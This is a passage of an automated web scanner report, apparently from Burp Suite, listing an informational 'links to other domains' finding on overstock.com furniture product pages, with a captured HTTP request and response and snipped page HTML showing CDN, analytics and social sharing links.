src="http://ak1.ostkcdn.com/images/products/P11917718.jpg"
alt="Oval-tip Burnt Paisley Arm Chair"


width='250'

border="0"
onLoad="CheckSize(this)"
/>


</div>
...[SNIP]...
<li class="active" id="node1">

<a onclick="return viewLarger();" onmouseover="return showPicture(this, false,false)" title="Oval-tip Burnt Paisley Arm Chair" href="http://ak1.ostkcdn.com/images/products/P11917718.jpg">
<img height='72' name="proimg" id="image" class="sizedProdImage" src="http://ak2.ostkcdn.com/images/products/P11917718.jpg" >

</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLA11917718.jpg" >
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLA11917718.jpg" alt="Oval-tip Burnt Paisley Arm Chair" >
</a>
...[SNIP]...
<li>
<a onclick="return viewLarger();" onmouseover="return showPicture(this, false, false)" href="http://ak1.ostkcdn.com/images/products/MLB11917718.jpg">
<img height="72" src="http://ak1.ostkcdn.com/images/products/MLB11917718.jpg" alt="Oval-tip Burnt Paisley Arm Chair">
</a>
...[SNIP]...
<div class="flashPlayer" id="flashcontent" >
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak2.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak2.ostkcdn.com/img/mxc/stars4_6.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak2.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak2.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak2.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak2.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak2.ostkcdn.com/img/mxc/stars4_6.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak2.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage5" src="http://ak2.ostkcdn.com/img/mxc/stars4_0.gif" alt="" /></p>
...[SNIP]...
<!-- id="bd" -->


<script language="JavaScript" src="http://ak2.ostkcdn.com/js/s_code.js" type='text/javascript'></script>
...[SNIP]...
<li><a href="http://www.facebook.com/Overstockdotcom" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/overstock" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.o.biz?TID=FOOT:RS:OBIZ" target="_blank">O.biz</a>
...[SNIP]...
<li><a href="http://www.eziba.com?TID=FOOT:RS:EZIBA" target="_blank">Eziba.com</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1787227;type=count546;cat=produ835;u1=11917718;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- PERMUTO PRODUCT PAGE PIXEL -->
<script type="text/javascript"
src="http://img.pulsemgr.com/script/pm/100/">
</script>
...[SNIP]...

5.16. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html?IID=prod4092961&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:00 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:00 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:00 GMT; Path=/
Set-Cookie: mxcproclicks=4092961|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:00 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 130342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
.org/ratingsv02.html" l gen true for "http://www.overstock.com/" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.overstock.com/" r (n 0 s 0 v 0 l 0))'>

<link rel="shortcut icon" href="http://ak1.ostkcdn.com/favicon.ico">
<link rel="stylesheet" href="http://ak1.ostkcdn.com/css/os-master.1.2.2.min.css">
<!--[if IE]>
...[SNIP]...
<!--End Element SITE_HEAD_S -->


<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/product-page.1.1.1.min.css" media="all">
<script language="JavaScript1.1" type="text/javascript" src="http://ak1.ostkcdn.com/js/ProductPageCommon.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/swfobject.js"></script>
<script type="text/javascript" src="http://ak1.ostkcdn.com/js/lib/os/overstock.1.5.2.min.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='http://ak1.ostkcdn.com/js/sales_mtagconfig.js' type='text/javascript'> </script>


<link rel='SHORTCUT ICON' HREF='http://ak1.ostkcdn.com/favicon.ico'>


</head>
...[SNIP]...
<div class="checkOut" >
<img id="checkOutCartIcon" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif">
<a id="checkoutLink" href="http://www.overstock.com/cart" rel="nofollow">
...[SNIP]...
<a href="http://www.overstock.com/cart" rel="nofollow">
<img id="checkoutButton" border="0" src="http://ak1.ostkcdn.com/img/mxc/spacer.gif" style="margin-left: 10px;">
</a>
...[SNIP]...
<a href="http://www.overstock.com/intlcountryselect"><img src="http://ak1.ostkcdn.com/img/mxc/20101020_us_flag.gif" /></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://ak1.ostkcdn.com/js/p13n.js"></script>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=[url]&t=[title]" title="Facebook" rel="facebook" target="_blank"><i class="facebook">
...[SNIP]...
<li><a href="http://twitter.com/home?status=[url]%20-%20[title]" title="Twitter" rel="twitter" target="_blank"><i class="twitter">
...[SNIP]...
<li><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=[url]&title=[title]" title="Google" rel="google" target="_blank"><i class="google">
...[SNIP]...
<li><a href="http://www.myspace.com/Modules/PostTo/Pages/?u=[url]&t=[title]" title="Myspace" rel="myspace" target="_blank"><i class="myspace">
...[SNIP]...
<li><a href="https://skydrive.live.com/sharefavorite.aspx/.SharedFavorites??marklet=1&mkt=en-us&url=[url]&title=[title]" title="Live" rel="live" target="_blank"><i class="live">
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=[url]&amp;title=[title]" title="Digg" rel="digg" target="_blank"><i class="digg">
...[SNIP]...
<li><a href="http://del.icio.us/post?v=4&amp;noui&amp;jump=close&amp;url=[url]&title=[title]" title="Delicious" rel="delicious" target="_blank"><i class="delicious">
...[SNIP]...
<li><a href="http://reddit.com/submit?url=[url]&title=[title]" title="Reddit" rel="reddit" target="_blank"><i class="reddit">
...[SNIP]...
<li><a href="http://www.blogger.com/blog_this.pyra?u=[url]&t=[title]" title="Blogger" rel="blogger" target="_blank"><i class="blogger">
...[SNIP]...
<div id="prodMain_imgGallery" class="col6span2">
<link rel="stylesheet" type="text/css" href="http://ak1.ostkcdn.com/css/productPageImgGallery.css"/>

<!-- ZONE - ImageGallery - BEGIN -->
...[SNIP]...
<div id="zoomify_div">

<img style="display: block;" onclick="return viewLarger();" id="activeImage" src="http://ak2.ostkcdn.com/images/products/P12105211.jpg" alt="Retro-classic White Accent Chairs (Set of 2)"


width='250'

border="0"
onLoad="CheckSize(this)"
/>



<div id="adobeIcon">
<a href="http://www.adobe.com/go/getflashplayer" target="_blank">
<img src="http://ak1.ostkcdn.com//img/mxc/get_flash_player.gif" alt="Get Adobe Flash player" />
</a>
...[SNIP]...
</span>

<img id="starImage" alt="Overall Rating" src="http://ak1.ostkcdn.com/img/mxc/stars4_4.gif">

<a id="showAllReviewsLink" title="Read Reviews" href="http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/customer-reviews.html">
...[SNIP]...
<dl>
<img src='http://ak1.ostkcdn.com/img/mxc/20090714_cc+logos.gif' border='0' alt=''><h3 class="heading">
...[SNIP]...
</ul>
<img src="http://ak1.ostkcdn.com/img/mxc/08-icon_payPal.gif" title="PapPal" />
<dd>
...[SNIP]...
pture-content/fetch?hash=GD829B8P&amp;content=/bmlweb/os_tnpupto6mnomin500rollingiw.html ','BMLPopUp','width=550,height=500,resizable=yes,menubar=yes,location=yes,status=yes,scrollbars=yes')" href="#"><img src="http://ak1.ostkcdn.com/img/mxc/08-icon_BML.gif" title="BillMeLater" /></a>
...[SNIP]...
<dl>
<img border="0" alt="" alt="Overstock.com MasterCard Card" src="http://ak1.ostkcdn.com/img/mxc/2010-CB_CreditCardIcon-med.gif"><h3 class="heading">
...[SNIP]...
</span><img src="http://ak1.ostkcdn.com/img/mxc/stars4_4.gif" alt="" />
</div>
...[SNIP]...
<p>Rating <img id="starImage1" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage2" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage3" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>
...[SNIP]...
<p>Rating <img id="starImage4" src="http://ak1.ostkcdn.com/img/mxc/stars5_0.gif" alt="" /></p>